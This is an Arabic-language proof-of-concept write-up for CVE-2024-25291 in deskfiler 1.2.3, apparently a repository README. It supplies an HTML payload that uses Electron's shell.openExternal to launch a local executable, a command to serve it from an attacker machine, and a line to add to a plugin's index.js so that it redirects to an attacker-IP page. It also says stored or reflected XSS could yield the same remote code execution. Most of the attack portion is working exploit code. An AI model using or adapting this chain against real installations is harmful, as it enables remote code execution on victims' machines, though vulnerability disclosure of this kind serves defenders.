
deskfiler 1.2.3 استغلال ثغرة إعادة التوجيه المفتوحة
إثبات مفهوم لثغرة CVE-2024-25291.
deskfiler - 1.2.3 يسمح بـ Electron Webview في التطبيق، مع ما ينتج عنه من تنفيذ تعليمات برمجية عن بُعد.
في هذا المستودع يوجد تطبيق مثال قابل للاستغلال وإثبات مفهوم (POC) لاستغلاله.
<html>
<head>
<title>jruru</title>
</head>
<body>
<script>
const { shell } = require('electron');
shell.openExternal('file:C:/Windows/System32/calc.exe');
</script>
</body>
</html>
※ إذا كنت تريد اختباره بسرعة، أنشئ خادمًا على جهاز المهاجم باستخدام الكود التالي.
$ python -m http.server 80
ملاحظة: ※ في هذا الوقت، يُفترض أن البرنامج الإضافي هو برنامج إضافي تم إنشاؤه بواسطة المهاجم، وهو مجرد برنامج إضافي عادي تمت إضافة كود إليه للسماح بالوصول إلى خادم المهاجم. تم اختيار BareBone للاختبار البسيط

بعد ذلك، أضف الكود التالي إلى ملف index.js في مسار مجلد BareBone.
window.location='http://[attacker_ip]/hack.html'


في إثبات المفهوم هذا، استخدمنا برنامجًا إضافيًا؛ ومع ذلك، نعتقد أنه مع متجهات هجوم بديلة، يمكن تحقيق تنفيذ تعليمات برمجية عن بُعد (RCE) بشكل مستقل. بالإضافة إلى ذلك، إذا وُجدت ثغرات من جانب الخادم مثل XSS المخزنة (Stored XSS) أو XSS المنعكسة (Reflected XSS)، فإن RCE يُعتبر ممكنًا أيضًا.